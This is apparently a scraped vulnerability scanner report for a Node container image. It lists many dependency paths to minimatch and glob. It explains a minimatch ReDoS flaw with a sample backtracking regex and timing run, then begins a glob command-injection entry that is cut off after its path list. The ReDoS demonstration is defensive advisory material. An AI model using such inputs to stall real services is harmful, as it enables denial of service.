  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + + +
    • +
+ +
+ +
+ +

Overview

+

minimatch is a minimal matching utility.

+

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the AST class, caused by catastrophic backtracking when an input string contains many * characters in a row, followed by an unmatched character.

+

Details

+

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

+

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

+

Let’s take the following regular expression as an example:

+ 
regex = /A(B|C+)+D/
+
+

This regular expression accomplishes the following:

+
    +
  • A The string must start with the letter 'A'
    • +
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
    • +
  • D Finally, we ensure this section of the string ends with a 'D'
    • +
+

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

+

It most cases, it doesn't take very long for a regex engine to find a match:

+ 
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
+        0.04s user 0.01s system 95% cpu 0.052 total
+        
+        $ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
+        1.79s user 0.02s system 99% cpu 1.812 total
+
+

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

+

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

+

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

+
    +
  1. CCC
    2. +
  2. CC+C
    3. +
  3. C+CC
    4. +
  4. C+C+C.
    5. +
+

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

+

From there, the number of steps the engine must use to validate a string just continues to grow.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + +
StringNumber of C'sNumber of steps
ACCCX338
ACCCCX471
ACCCCCX5136
ACCCCCCCCCCCCCCX1465,553
+

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

+

Remediation

+

Upgrade minimatch to version 10.2.1 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

Command Injection

+
+ +
+
+ high severity +
+
+ Exploit: Proof of Concept +
+
+ +
+ +
    +
  • + Manifest file: node:18-alpine /usr/local/lib/node_modules +
    • +
  • + Package Manager: npm +
    • +
  • + Vulnerable module: + + glob +
    • + +
  • Introduced through: + + + lib@*, npm@10.8.2 and others +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + lib@* + + npm@10.8.2 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/config@8.3.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/config@8.3.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + init-package-json@6.0.3 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
